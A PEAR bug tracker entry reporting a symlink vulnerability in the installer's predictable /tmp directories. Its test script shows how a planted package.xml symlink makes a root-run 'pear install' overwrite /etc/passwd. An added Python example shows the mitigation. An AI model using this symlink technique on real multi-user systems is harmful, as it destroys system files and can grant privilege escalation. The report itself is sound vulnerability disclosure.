
Bug #18055 [SECURITY]: Symlink attack
Submitted: 2010-11-14 20:24 UTC
From: ondrej
Assigned:
Status: Duplicate
Package: PEAR (version 1.9.1)
PHP Version: 5.3.3
OS: Linux
Roadmaps: (Not assigned)

 [2010-11-14 20:24 UTC] ondrej (Ondřej Surý)
Description:
------------
There's a symlink vulnerability when doing PEAR install. PEAR should really be using $(mktemp) for its directories like download_dir, cache_dir and tmp_dir, and check whether the directory doesn't exist.

Test script:
---------------
# pear config-show | grep /tmp
PEAR Installer cache directory cache_dir /tmp/pear/cache
PEAR Installer download download_dir /tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory temp_dir /tmp/pear/temp
# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17 /tmp/buildd/php5-5.3.3/pear-build-download
# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout
# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://
# head /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.9.1" version="2.0" xmlns="" xmlns:tasks="" xmlns:xsi="" xsi:schemaLocation="">
 <name>Net_Socket</name>
 <channel></channel>
 <summary>Network Socket Interface</summary>
 <description>Net_Socket is a class interface to TCP sockets. It provides blocking and non-blocking operation, with different reading and writing modes (byte-wise, block-wise, line-wise and special formats like network byte-order ip addresses).</description>
 <lead>

Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.

Actual result:
--------------
Overwritten /etc/passwd just by creating right directories and symlinks.
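
The mitigation requested in the report above, as an added example that is not part of the original report or of PEAR's code: a private `mktemp -d`-style working directory, a trust check for a preconfigured directory, and file creation that refuses a planted symlink. It is written in Python rather than PEAR's PHP; the function names and the demo paths are assumptions constructed for illustration.

```python
import os
import stat
import tempfile


def private_workdir(prefix="pear-"):
    """Create an unpredictable, owner-only (0700) directory, like `mktemp -d`."""
    return tempfile.mkdtemp(prefix=prefix)


def dir_is_trustworthy(path):
    """Accept a configured directory only if it is a real directory (not a
    symlink), owned by us, and not writable by group or others."""
    st = os.lstat(path)
    return (stat.S_ISDIR(st.st_mode)
            and st.st_uid == os.geteuid()
            and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def write_new_file(directory, name, data):
    """Create `name` inside `directory`, refusing to follow or reuse anything
    already there. O_EXCL fails if the name exists (including a symlink,
    dangling or not); O_NOFOLLOW is a second guard on the final component."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(os.path.join(directory, name), flags, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: a planted package.xml symlink in a shared dir."""
    base = private_workdir("demo-")
    victim = os.path.join(base, "victim.txt")   # stands in for a system file
    with open(victim, "wb") as fh:
        fh.write(b"original\n")
    shared = os.path.join(base, "shared")
    os.mkdir(shared)
    os.chmod(shared, 0o777)                     # predictable, world-writable
    os.symlink(victim, os.path.join(shared, "package.xml"))
    try:
        write_new_file(shared, "package.xml", b"<package/>\n")
        blocked = False
    except FileExistsError:
        blocked = True
    with open(victim, "rb") as fh:
        untouched = fh.read() == b"original\n"
    return blocked, untouched, dir_is_trustworthy(shared)
```

`demo()` returns whether the write was blocked, whether the link target kept its contents, and whether the world-writable directory passed the trust check.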


 [2010-11-16 04:41 UTC] dufuz (Helgi Þormar Þorbjörnsson)
-Status: Open
+Status: Duplicate
 [2015-10-20 09:14 UTC] sathieu (Mathieu Parent)
Hello, This bug is marked as duplicate. But duplicate of what?
 [2015-10-20 09:24 UTC] cweiske (Christian Weiske)
Duplicate of bug #18056.